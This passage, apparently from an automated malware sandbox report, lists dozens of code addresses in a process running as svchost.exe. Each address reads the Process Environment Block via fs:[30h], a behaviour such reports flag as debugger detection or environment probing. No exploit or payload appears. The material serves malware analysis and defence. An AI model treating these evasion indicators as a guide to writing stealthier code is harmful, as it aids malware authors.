            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]2_2_02F666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02F6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]2_2_02F62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]2_2_02F4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]2_2_02F4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]2_2_02F66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]2_2_02F68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]2_2_02F3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]2_2_02F72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]2_2_02FAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02FBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]2_2_02FB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]2_2_02F307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE47A0 mov eax, dword ptr fs:[00000030h]2_2_02FE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]2_2_02FD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]2_2_02F38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]2_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]2_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]2_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]2_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]2_2_02F30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]2_2_02F60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]2_2_02F6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]2_2_02F304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]2_2_02F644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02FBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]2_2_02F364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]2_2_02FBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]2_2_02F2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]2_2_02F5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]2_2_02F6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]2_2_02F2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]2_2_02F325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]2_2_02F365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]2_2_02F6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]2_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]2_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]2_2_02F64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]2_2_02FC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]2_2_02F30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]2_2_02F86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]2_2_02F68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h]2_2_02FDEA60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]
